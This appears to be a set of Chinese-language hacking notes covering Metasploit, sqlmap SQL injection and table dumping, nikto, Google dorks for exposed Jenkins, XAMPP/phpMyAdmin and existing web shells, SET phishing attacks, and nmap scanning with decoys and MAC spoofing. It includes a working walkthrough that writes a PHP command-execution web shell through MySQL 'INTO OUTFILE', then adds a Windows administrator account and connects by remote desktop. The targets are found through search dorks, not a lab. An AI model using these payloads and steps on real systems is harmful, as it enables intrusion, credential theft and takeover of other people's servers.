metasploit使用方法:启动: 第一步:启用Postgresql服务。service postgresql start 第二步:启用metasploit服务。service matasploit start 第三步:启动框架。msfconsole
一个ASP站点的sql注入测试数字型注入点1.网址:asp?ID+13,后面加',看看是什么数据库,然后输入1=1,1=2,得到数据库是microsoft acess
2.转用sqlmap工具测试,命令:sqlmap -u 目标网址 --dbs --current-user
sqlmap拆解数据库和表名拆解表名 命令:sqlmap -u 目标网址 --tables,线程数最大为10,基于字典拆解表名,得到的表可能不全面。
dump表数据
1.拆解一个表的列名
命令:sqlmap -u 目标网址 -T 表名 --columns
2.得到感兴趣的字段的值 命令:sqlmap -u 目标网址 -T 表名 -C 列名1,列名2,列名3 --dump
登录后台找到登录按钮
教训:数据库密码一定要加密!
一个PHP站点的sql注入测试数字型注入点index.php?id=1,同上,得到数据库为mysql
sqlmap拆解数据库和表名1.扫描数据库 命令:sqlmap -u 目标网址 --dbs --current-user 2.扫描某个数据库的表 命令:sqlmap -u 目标网址 --dbms mysql-D 数据库名 --tables,参数可自行选择
dump表数据查看表字段 同上
利用nikto帮助寻找隐藏目录,利用网页源代码中的隐藏信息寻找管理后台命令:nikto -host 目标网站 将找到的路径放进去查看,一个个试试,附加上查看源代码,找manage 提升管理员权限: 用fiddler看看页面情况,查看系统返回的代码,编辑建立HTML文件,运行,设置fiddler(auto),将返回结果保存在本地。 返回页面
Google hack实战
能做到的事:1.寻找持续构建工具Jenkins管理面板,有可能获取某些项目的源代码或者敏感信息; 2.综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西 3.后门查找 4.关于Google hack database Google hack语法查询:http://www.xuanhun521.com
寻找持续构建工具Jenkins(一个源代码构建工具,可以查看开发人员,项目,源代码)管理面板1.inurl:8080 intitle:"Dashboard [Jenkins]" 造成源代码泄露
综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西
寻找安装xampp的主机:inurl:"xampp/index" intext:"XAMPP for Windows" 1)寻找phpmyadmin不用验证或者弱口令管理页面,通过mysql的root权限插入一句话木马提取,获取服务器管理权限 1>>有用信息:phpinfo。可以看到网站目录;phpmyadmin管理入口,看权限菜单,添加用户 2>>连接网站的mysql服务器 命令:mysql -u 你添加的用户名 -h 你找的网站ip -p 你添加的账户密码 use mysql 3>>创建表 4>>向表中插入数据,其实插入的是一段命令,调用cmd并且在系统环境下执行 命令:INSERT INTO aa (packet) VALUES('<pre><body bgcolor=silver><? @sysytem($_GET["cmd"]); ?></body></pre>') 5>>select * into outfile ' / / / /aa.php ' from aa,这里的路径应该是可执行的。可以将路径粘贴下来,写如phpinfo的路径 6>>访问这个网站地址。........../aa.php 7>>好了,接下来我们前面插入的那句话就要起作用啦。试着访问........../aa.php?cmd=dir,这里可以写好多命令哦 8>>接下来创建账号cmd=net user 小明 123456 /add ,创建成功! 9>>将我们创建的账户添加到管理员用户组cmd=net localgroup administrators 小明 /add 10>>启动mstsc,远程连接,用户名和密码就是我们刚刚创建的小明和123456
后门查找
Google搜索目标:intitle:"=[1n73ct10n privat shell]=" intitle:"WSO 2.4"[Sec.Info],[Files],[Console],[Sql],[Php],[Safe mode],[String tools],[Bruteforce],[Network],[Self remove]
关于google hack database:http://www.exploit-db.com/google-dorks/
SET,社会工程学工具集SET是开源的社会工程学利用套件,通常结合metasploit来使用 进入kali,用命令setoolkit启动,选1。攻击方法: 鱼叉式钓鱼攻击(通过邮件,发送有问题邮件),网站攻击,介质感染攻击,群发邮件攻击,基于Arduino的攻击,短信欺骗攻击,无线接入点攻击,二维码攻击,powershell攻击
nmap主机扫描:
namp -sL 103.10.87.1-255 列表扫描
nmap -PE IP nmap -Pn IP(不适用ping扫描,更适用于Internet) nmap -sP IP(快速ping扫描),用来快速发现存活主机 -sn参数,只探测存活主机,不管端口啥的
尝试多种扫描方式,来扫描主机 端口扫描:
nmap -sS IP nmap -sT IP ;TCP端口扫描 nmap -sU IP; UDP端口扫描 nmap -sU -p 80,445 IP ;指定端口 nmap -sT -v IP启用细节模式 操作系统探测: 参数: -O(启用操作系统检测) -osscan-limit(针对指定的目标进行操作系统检测) --osscan-guess;--fuzzy(推测OS检测结果,在nmap不能给出确定结果的情况下使用) 示例: nmap -sT -O IP nmap -sT -p 3390 -O --osscan-limit IP (只有打开3390端口,才进行操作系统版本探测)
namp -sA -O IP 服务程序探测: nmap -sA -sV IP 扫描方式ACK ;扫描某台主机的服务程序
nmap -sV -p 22,53,110 ;扫描某个服务的服务程序 nmap高级用法: nmap --iflist(查看本地路由与接口) 可以看到网关地址,网络接口啥的
nmap -e 08:00:27:47:63:E6 IP(指定mac和IP地址)(本地有多个网络接口时 nmap -T4 -F -n -Pn -D192.168.1.100,192.168.1.101,192.168.1.102,ME 192.168.1.103(地址诱骗)前面地址都是虚假的,后面的才是真的 nmap -sV --spoof -mac 08:00:27:47:63:E6 IP(虚假mac地址) nmap -sV --source-port 900 IP --source-port(指定源端口) nmap -p1-25,80,512,2001,4001,6001,9001 10.20.0.1/16(扫描思科路由器) nmap -sU -p69 -nvv 192.168.1.253(扫描路由器的tftp协议) nmap -O -F -n 103.10.87.148(-F快速扫描) 扫描常见的端口 nmap --script=brute 103.10.87.148(暴力破解)
|